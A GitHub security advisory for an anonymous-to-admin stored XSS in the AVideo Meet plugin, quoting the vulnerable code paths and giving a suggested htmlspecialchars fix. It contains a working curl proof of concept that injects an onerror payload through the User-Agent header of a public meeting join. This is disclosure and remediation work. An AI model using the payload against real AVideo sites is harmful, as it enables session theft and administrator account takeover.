GHSA-7CQP-7CFV-6C3Q

Vulnerability from github – Published: 2026-06-23 19:11 – Updated: 2026-06-23 20:41
VLAI
Summary
AVideo Meet plugin: anonymous-to-admin stored XSS via unescaped participant User-Agent in getMeetInfo.json.php Participants panel
Details

Summary

The Meet plugin stores the raw HTTP User-Agent header of every meeting participant and later renders it without output encoding in the meeting-management ("Participants") panel that the meeting host and site administrators open. An anonymous, unauthenticated attacker can join any public meeting while sending a User-Agent header containing an HTML payload. The payload is persisted in meet_join_log.user_agent and, when the host or an administrator opens the participant list, is injected verbatim into their DOM, executing attacker-controlled JavaScript in a privileged, authenticated session. This is a cross-privilege stored XSS: an anonymous visitor obtains script execution in the administrator's browser.

Affected versions

WWBN/AVideo at current master commit e8d6119f3cb1b849149906efeb0a41fc024f59f8 (and prior releases shipping the same code path). Not patched at the time of this report.

Privilege required

  • Writer (attacker): unauthenticated / anonymous. Joining a public meeting requires no account and no password.
  • Victim (trigger): the meeting host or any site administrator who opens the meeting's participant-management panel.

Vulnerable code (file:line)

The stored value is never sanitized on write, then echoed without encoding on read.

Write path — plugin/Meet/Objects/Meet_join_log.php:147:

    public function setUser_agent($user_agent)
    {
        $this->user_agent = $user_agent;
    }

Write path — plugin/Meet/Objects/Meet_join_log.php:177:

    public static function log($meet_schedule_id)
    {
        $log = new Meet_join_log(0);
        $log->setIp(getRealIpAddr());
        $log->setMeet_schedule_id($meet_schedule_id);
        $log->setUser_agent((isMobile() ? "Mobile: " : "") . get_browser_name());
        $log->setUsers_id(User::getId());
        return $log->save();
    }

get_browser_name() (objects/functionsBrowser.php:239 and :242) returns the original-case User-Agent verbatim for any agent not matched to a known browser name:

        return '[Bot] Other '.$user_agent;
    }
    //_error_log("Unknow user agent ($t) IP=" . getRealIpAddr() . " URI=" . getRequestURI());
    return 'Other (Unknown) '.$user_agent;

Only the lowercased match copy is used for classification; the returned string still contains the raw, original $_SERVER['HTTP_USER_AGENT']. Because the value bypasses AVideo's object-setter sanitization layer (unlike Meet_schedule::setTopic(), which calls xss_esc()), the raw bytes reach the database unchanged.

Read path — plugin/Meet/getMeetInfo.json.php:71:

                        echo '<li class="list-group-item">#' . $count . " - " . User::getNameIdentificationById($value['users_id']) . ' <span class="badge">' . $value['created'] . '</span><br><small class="text-muted">' . $value['user_agent'] . '</small></li>';

$value['user_agent'] is concatenated into the HTML with no htmlspecialchars(). The reader endpoint is gated by Meet_schedule::canManageSchedule() (site admin OR the schedule owner), so the value is rendered in a privileged context.

How input reaches the sink

The join that records the log is reachable anonymously through plugin/Meet/iframe.php:11 and :17:

if (!Meet::validatePassword($meet_schedule_id, @$_REQUEST['meet_password'])) {
    header("Location: {$global['webSiteRootURL']}plugin/Meet/confirmMeetPassword.php?meet_schedule_id=$meet_schedule_id");
    exit;
}
$objLive = AVideoPlugin::getObjectData("Live");
Meet_join_log::log($meet_schedule_id);

For a public meeting (public = 2), Meet::validatePassword() returns true for an anonymous request (no password set), so Meet_join_log::log() runs and stores the attacker's User-Agent. On the read side, the host/admin opens the participant modal, whose JavaScript fetches getMeetInfo.json.php and injects the response with jQuery .html() in plugin/Meet/meet_scheduled.php:266:

                                                                success: function (response) {
                                                                    if (response.error) {
                                                                        avideoAlert("<?php echo __("Sorry!"); ?>", response.msg, "error");
                                                                    } else {
                                                                        $('#Meet_schedule2<?php echo $meet_scheduled, $manageMeetings; ?>Modal .modal-body').html(response.html);
                                                                    }

.html(response.html) parses and inserts the attacker-controlled markup, so the injected onerror handler executes in the host/admin DOM.

Proof of concept — end-to-end reproduction (against pinned version)

Deployed against the project's official Docker stack (php8.5/apache2.4 + mariadb), pinned commit e8d6119f3cb1b849149906efeb0a41fc024f59f8. <TARGET> is the deployed host.

# 1. As the admin, create a PUBLIC meeting (public=2, no password):
curl -sk -H 'Host: <TARGET>' -H "Cookie: $ADMIN_SESSION" -H 'Referer: https://<TARGET>/' \
  --data-urlencode 'RoomTopic=Demo' --data-urlencode 'public=2' --data-urlencode 'RoomPasswordNew=' \
  'https://<TARGET>/plugin/Meet/saveMeet.json.php'
# Response: {"error":false,"meet_schedule_id":1, ...}

# 2. As an ANONYMOUS attacker (no cookie), join the meeting while sending an HTML
#    payload in the User-Agent. The trailing token " http" forces get_browser_name()
#    into the raw-reflecting "[Bot] Other" branch.
curl -sk -H 'Host: <TARGET>' -H 'Referer: https://<TARGET>/' \
  -A '<img src=x onerror=alert(document.domain)> http' \
  'https://<TARGET>/plugin/Meet/iframe.php?meet_schedule_id=1&meet_password='
# HTTP 200. Stored row: meet_join_log.user_agent =
#   [Bot] Other <img src=x onerror=alert(document.domain)> http

# 3. As the host/admin, open the participant panel:
curl -sk -H 'Host: <TARGET>' -H "Cookie: $ADMIN_SESSION" -H 'Referer: https://<TARGET>/plugin/Meet/' \
  'https://<TARGET>/plugin/Meet/getMeetInfo.json.php?meet_schedule_id=1'

The JSON html field contains the payload unescaped:

<small class="text-muted">[Bot] Other <img src=x onerror=alert(document.domain)> http</small>

When the admin opens the participant modal in a browser, jQuery .html(response.html) injects this markup and the onerror handler executes in the admin's authenticated session, printing document.domain.

Negative control: joining with a benign browser User-Agent (Mozilla/5.0 (Windows NT 10.0) Chrome/120.0 Safari/537.36) causes get_browser_name() to return Chrome, which renders as plain text <small class="text-muted">Chrome</small> with no markup injection.

Impact

  • Cross-privilege stored XSS: an unauthenticated, anonymous visitor achieves JavaScript execution in the meeting host's and site administrator's authenticated browser sessions.
  • Full account-takeover surface: theft of the admin session, CSRF-token exfiltration, and arbitrary authenticated actions (user and permission changes, plugin configuration) performed as the administrator.
  • The payload persists in the database and fires for every privileged user who reviews the participant list of the affected meeting.

Suggested fix

Encode the stored value at the sink in plugin/Meet/getMeetInfo.json.php:71:

. '</span><br><small class="text-muted">' . htmlspecialchars($value['user_agent'], ENT_QUOTES, 'UTF-8') . '</small></li>';

Defense in depth: sanitize the value on write in Meet_join_log::setUser_agent(), mirroring the setter-layer encoding used by Meet_schedule::setTopic() (xss_esc()), so any other current or future reader of meet_join_log.user_agent is also protected.

Fix PR

A fix is provided on the advisory's private temporary fork: WWBN/AVideo-ghsa-7cqp-7cfv-6c3q#1 (encodes the participant User-Agent at the sink with htmlspecialchars($value['user_agent'], ENT_QUOTES, 'UTF-8')).

Credit

Reported by tonghuaroot.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T19:11:27Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe Meet plugin stores the raw HTTP `User-Agent` header of every meeting participant and later renders it without output encoding in the meeting-management (\"Participants\") panel that the meeting host and site administrators open. An anonymous, unauthenticated attacker can join any public meeting while sending a `User-Agent` header containing an HTML payload. The payload is persisted in `meet_join_log.user_agent` and, when the host or an administrator opens the participant list, is injected verbatim into their DOM, executing attacker-controlled JavaScript in a privileged, authenticated session. This is a cross-privilege stored XSS: an anonymous visitor obtains script execution in the administrator\u0027s browser.\n\n### Affected versions\n\n`WWBN/AVideo` at current `master` commit `e8d6119f3cb1b849149906efeb0a41fc024f59f8` (and prior releases shipping the same code path). Not patched at the time of this report.\n\n### Privilege required\n\n- **Writer (attacker):** unauthenticated / anonymous. Joining a public meeting requires no account and no password.\n- **Victim (trigger):** the meeting host or any site administrator who opens the meeting\u0027s participant-management panel.\n\n### Vulnerable code (file:line)\n\nThe stored value is never sanitized on write, then echoed without encoding on read.\n\nWrite path \u2014 `plugin/Meet/Objects/Meet_join_log.php:147`:\n\n```php\n    public function setUser_agent($user_agent)\n    {\n        $this-\u003euser_agent = $user_agent;\n    }\n```\n\nWrite path \u2014 `plugin/Meet/Objects/Meet_join_log.php:177`:\n\n```php\n    public static function log($meet_schedule_id)\n    {\n        $log = new Meet_join_log(0);\n        $log-\u003esetIp(getRealIpAddr());\n        $log-\u003esetMeet_schedule_id($meet_schedule_id);\n        $log-\u003esetUser_agent((isMobile() ? \"Mobile: \" : \"\") . get_browser_name());\n        $log-\u003esetUsers_id(User::getId());\n        return $log-\u003esave();\n    }\n```\n\n`get_browser_name()` (`objects/functionsBrowser.php:239` and `:242`) returns the original-case `User-Agent` verbatim for any agent not matched to a known browser name:\n\n```php\n        return \u0027[Bot] Other \u0027.$user_agent;\n    }\n    //_error_log(\"Unknow user agent ($t) IP=\" . getRealIpAddr() . \" URI=\" . getRequestURI());\n    return \u0027Other (Unknown) \u0027.$user_agent;\n```\n\nOnly the lowercased match copy is used for classification; the returned string still contains the raw, original `$_SERVER[\u0027HTTP_USER_AGENT\u0027]`. Because the value bypasses AVideo\u0027s object-setter sanitization layer (unlike `Meet_schedule::setTopic()`, which calls `xss_esc()`), the raw bytes reach the database unchanged.\n\nRead path \u2014 `plugin/Meet/getMeetInfo.json.php:71`:\n\n```php\n                        echo \u0027\u003cli class=\"list-group-item\"\u003e#\u0027 . $count . \" - \" . User::getNameIdentificationById($value[\u0027users_id\u0027]) . \u0027 \u003cspan class=\"badge\"\u003e\u0027 . $value[\u0027created\u0027] . \u0027\u003c/span\u003e\u003cbr\u003e\u003csmall class=\"text-muted\"\u003e\u0027 . $value[\u0027user_agent\u0027] . \u0027\u003c/small\u003e\u003c/li\u003e\u0027;\n```\n\n`$value[\u0027user_agent\u0027]` is concatenated into the HTML with no `htmlspecialchars()`. The reader endpoint is gated by `Meet_schedule::canManageSchedule()` (site admin OR the schedule owner), so the value is rendered in a privileged context.\n\n### How input reaches the sink\n\nThe join that records the log is reachable anonymously through `plugin/Meet/iframe.php:11` and `:17`:\n\n```php\nif (!Meet::validatePassword($meet_schedule_id, @$_REQUEST[\u0027meet_password\u0027])) {\n    header(\"Location: {$global[\u0027webSiteRootURL\u0027]}plugin/Meet/confirmMeetPassword.php?meet_schedule_id=$meet_schedule_id\");\n    exit;\n}\n$objLive = AVideoPlugin::getObjectData(\"Live\");\nMeet_join_log::log($meet_schedule_id);\n```\n\nFor a public meeting (`public = 2`), `Meet::validatePassword()` returns `true` for an anonymous request (no password set), so `Meet_join_log::log()` runs and stores the attacker\u0027s `User-Agent`. On the read side, the host/admin opens the participant modal, whose JavaScript fetches `getMeetInfo.json.php` and injects the response with jQuery `.html()` in `plugin/Meet/meet_scheduled.php:266`:\n\n```js\n                                                                success: function (response) {\n                                                                    if (response.error) {\n                                                                        avideoAlert(\"\u003c?php echo __(\"Sorry!\"); ?\u003e\", response.msg, \"error\");\n                                                                    } else {\n                                                                        $(\u0027#Meet_schedule2\u003c?php echo $meet_scheduled, $manageMeetings; ?\u003eModal .modal-body\u0027).html(response.html);\n                                                                    }\n```\n\n`.html(response.html)` parses and inserts the attacker-controlled markup, so the injected `onerror` handler executes in the host/admin DOM.\n\n### Proof of concept \u2014 end-to-end reproduction (against pinned version)\n\nDeployed against the project\u0027s official Docker stack (php8.5/apache2.4 + mariadb), pinned commit `e8d6119f3cb1b849149906efeb0a41fc024f59f8`. `\u003cTARGET\u003e` is the deployed host.\n\n```bash\n# 1. As the admin, create a PUBLIC meeting (public=2, no password):\ncurl -sk -H \u0027Host: \u003cTARGET\u003e\u0027 -H \"Cookie: $ADMIN_SESSION\" -H \u0027Referer: https://\u003cTARGET\u003e/\u0027 \\\n  --data-urlencode \u0027RoomTopic=Demo\u0027 --data-urlencode \u0027public=2\u0027 --data-urlencode \u0027RoomPasswordNew=\u0027 \\\n  \u0027https://\u003cTARGET\u003e/plugin/Meet/saveMeet.json.php\u0027\n# Response: {\"error\":false,\"meet_schedule_id\":1, ...}\n\n# 2. As an ANONYMOUS attacker (no cookie), join the meeting while sending an HTML\n#    payload in the User-Agent. The trailing token \" http\" forces get_browser_name()\n#    into the raw-reflecting \"[Bot] Other\" branch.\ncurl -sk -H \u0027Host: \u003cTARGET\u003e\u0027 -H \u0027Referer: https://\u003cTARGET\u003e/\u0027 \\\n  -A \u0027\u003cimg src=x onerror=alert(document.domain)\u003e http\u0027 \\\n  \u0027https://\u003cTARGET\u003e/plugin/Meet/iframe.php?meet_schedule_id=1\u0026meet_password=\u0027\n# HTTP 200. Stored row: meet_join_log.user_agent =\n#   [Bot] Other \u003cimg src=x onerror=alert(document.domain)\u003e http\n\n# 3. As the host/admin, open the participant panel:\ncurl -sk -H \u0027Host: \u003cTARGET\u003e\u0027 -H \"Cookie: $ADMIN_SESSION\" -H \u0027Referer: https://\u003cTARGET\u003e/plugin/Meet/\u0027 \\\n  \u0027https://\u003cTARGET\u003e/plugin/Meet/getMeetInfo.json.php?meet_schedule_id=1\u0027\n```\n\nThe JSON `html` field contains the payload **unescaped**:\n\n```html\n\u003csmall class=\"text-muted\"\u003e[Bot] Other \u003cimg src=x onerror=alert(document.domain)\u003e http\u003c/small\u003e\n```\n\nWhen the admin opens the participant modal in a browser, jQuery `.html(response.html)` injects this markup and the `onerror` handler executes in the admin\u0027s authenticated session, printing `document.domain`.\n\n**Negative control:** joining with a benign browser `User-Agent` (`Mozilla/5.0 (Windows NT 10.0) Chrome/120.0 Safari/537.36`) causes `get_browser_name()` to return `Chrome`, which renders as plain text `\u003csmall class=\"text-muted\"\u003eChrome\u003c/small\u003e` with no markup injection.\n\n### Impact\n\n- Cross-privilege stored XSS: an unauthenticated, anonymous visitor achieves JavaScript execution in the meeting host\u0027s and site administrator\u0027s authenticated browser sessions.\n- Full account-takeover surface: theft of the admin session, CSRF-token exfiltration, and arbitrary authenticated actions (user and permission changes, plugin configuration) performed as the administrator.\n- The payload persists in the database and fires for every privileged user who reviews the participant list of the affected meeting.\n\n### Suggested fix\n\nEncode the stored value at the sink in `plugin/Meet/getMeetInfo.json.php:71`:\n\n```php\n. \u0027\u003c/span\u003e\u003cbr\u003e\u003csmall class=\"text-muted\"\u003e\u0027 . htmlspecialchars($value[\u0027user_agent\u0027], ENT_QUOTES, \u0027UTF-8\u0027) . \u0027\u003c/small\u003e\u003c/li\u003e\u0027;\n```\n\nDefense in depth: sanitize the value on write in `Meet_join_log::setUser_agent()`, mirroring the setter-layer encoding used by `Meet_schedule::setTopic()` (`xss_esc()`), so any other current or future reader of `meet_join_log.user_agent` is also protected.\n\n### Fix PR\n\nA fix is provided on the advisory\u0027s private temporary fork: `WWBN/AVideo-ghsa-7cqp-7cfv-6c3q#1` (encodes the participant `User-Agent` at the sink with `htmlspecialchars($value[\u0027user_agent\u0027], ENT_QUOTES, \u0027UTF-8\u0027)`).\n\n### Credit\n\nReported by tonghuaroot.",
  "id": "GHSA-7cqp-7cfv-6c3q",
  "modified": "2026-06-23T20:41:56Z",
  "published": "2026-06-23T19:11:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-7cqp-7cfv-6c3q"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "AVideo Meet plugin: anonymous-to-admin stored XSS via unescaped participant User-Agent in getMeetInfo.json.php Participants panel"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…